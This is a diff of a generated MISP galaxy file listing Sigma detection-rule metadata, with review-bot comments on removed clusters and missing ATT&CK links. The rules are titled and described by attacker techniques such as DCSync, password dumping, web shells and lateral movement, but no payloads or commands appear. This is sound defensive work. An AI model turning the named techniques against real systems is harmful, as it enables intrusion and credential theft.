@@ -1160,8 +1777,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" ], "tags": [ @@ -1194,6 +1811,22 @@ "attack.t1496" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", "value": "DNS Events Related To Mining Pools" }, @@ -1210,12 +1843,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://github.com/corelight/CVE-2021-1675", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ 
@@ -1298,6 +1931,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, @@ -1315,10 +1971,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://twitter.com/neu5ron/status/1346245602502443009", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ @@ -1327,6 +1983,22 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "value": "Suspicious DNS Z Flag Bit Set" }, 
@@ -1352,221 +2024,18 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", "value": "Django Framework Exceptions" }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_password_dumper.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ] - }, - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - "value": "Antivirus Password Dumper Detection" - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "meta": { - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "filename": "av_printernightmare_cve_2021_34527.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_relevant_files.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_exploiting.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "meta": { - 
"author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_hacktool.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_webshell.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://github.com/tennc/webshell", - 
"https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_ransomware.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ] - }, - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus Ransomware Detection" - }, - { - "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. 
Such as dropping tables and selecting wildcard fields", - "meta": { - "author": "@juju4", - "creation_date": "2022/12/27", - "falsepositive": [ - "Inventory and monitoring activity", - "Vulnerability scanners", - "Legitimate applications" - ], - "filename": "db_anomalous_query.yml", - "level": "medium", - "logsource.category": "database", - "logsource.product": "No established product", - "refs": [ - "https://github.com/sqlmapproject/sqlmap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/database/db_anomalous_query.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.initial_access", - "attack.privilege_escalation", - "attack.t1190", - "attack.t1505.001" - ] - }, - "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", - "value": "Suspicious SQL Query" - }, { "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { @@ -1588,6 +2057,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "value": "Spring Framework Exceptions" }, @@ -1612,6 +2090,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "value": "Python SQL Exceptions" }, @@ -1636,6 +2123,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", "value": "Suspicious SQL Error Messages" }, 
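Review bot: The `@@ -1352,221 +2024,18 @@` hunk removes eight whole clusters (`Antivirus Password Dumper Detection` through `Suspicious SQL Query`, UUIDs `78cc2dd2-…`, `6fe1719e-…`, `c9a88268-…`, `238527ad-…`, `fa0c05b6-…`, `fdf135a2-…`, `4c6ca276-…`, `d84c0ded-…`) while this region otherwise only adds `related` arrays. If the regenerated file merely relocated them (the +571 line offset makes that plausible) nothing is lost, but if they were actually dropped, any event already tagged with `misp-galaxy:sigma-rules="Antivirus Web Shell Detection"` and the like silently loses its cluster. Please confirm those UUIDs still appear elsewhere in the new file, and if the generator now filters rules out, keep a deprecated stub for removed UUIDs rather than deleting them.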
@@ -1653,9 +2149,9 @@ "logsource.product": "ruby_on_rails", "refs": [ "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://edgeguides.rubyonrails.org/security.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -1663,6 +2159,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "value": "Ruby on Rails Framework Exceptions" }, @@ -1679,15 +2184,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/techniques/T1087/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ - "attack.t1087" + "attack.t1087", + "attack.discovery" ] }, "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", 
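Review bot: In the `rpc_firewall_sharphound_recon_account.yml` hunk the tag `attack.t1087` is kept and `attack.discovery` is added, but no `related` entry is emitted for T1087, whereas the rule on the next lines with `attack.t1569.002` receives `related` → `f1951e8a-500e-4a26-8803-76d95c4554b4`. At the same time the `https://attack.mitre.org/techniques/T1087/` reference is deleted, so this cluster now has no machine-readable link to its technique at all. Presumably the technique-to-UUID map used by the generator does not cover every technique referenced by the rule tags; it should be extended so that every `attack.tNNNN` tag yields a `related` entry, or the ATT&CK references should be retained until it does.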
@@ -1706,14 +2211,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0007/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "value": "Remote Registry Recon" 
@@ -1731,14 +2237,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "value": "Remote Schedule Task Recon via ITaskSchedulerService" 
@@ -1756,12 +2263,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ @@ -1769,6 +2274,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", "value": "Remote Server Service Abuse for Lateral Movement" }, 
@@ -1785,12 +2299,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ @@ -1799,6 +2311,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "value": "Remote Schedule Task Lateral Movement via ATSvc" }, 
@@ -1815,15 +2336,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ - "attack.t1033" + "attack.t1033", + "attack.discovery" ] }, "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", @@ -1842,12 +2363,13 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", - "https://attack.mitre.org/tactics/TA0007/", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", "value": "Remote Event Log Recon" 
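Review bot: The `rpc_firewall_dcsync_attack.yml` hunk leaves a DCSync detection (MS-DRSR references) tagged only `attack.t1033` and the newly added `attack.discovery`, with no `related` entry, so anyone pivoting through this galaxy from credential-access techniques will not find it. The tagging is inherited from the upstream Sigma rule, so the correction belongs there rather than in this generated file, but it is worth flagging upstream since a DCSync rule is normally a credential-access (not discovery) signal. As with the other rpc_firewall rules in this run, dropping the `attack.mitre.org` reference without emitting a `related` link removes the only technique pointer the cluster had.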
@@ -1865,12 +2387,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ @@ -1879,6 +2399,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" }, 
@@ -1895,12 +2424,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], "tags": [ @@ -1909,6 +2435,22 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", "value": "Remote DCOM/WMI Lateral Movement" }, 
@@ -1925,12 +2467,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ @@ -1939,6 +2479,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", "value": "Remote Schedule Task Lateral Movement via SASec" }, 
@@ -1955,13 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -1984,11 +2532,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://attack.mitre.org/techniques/T1033/", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ 
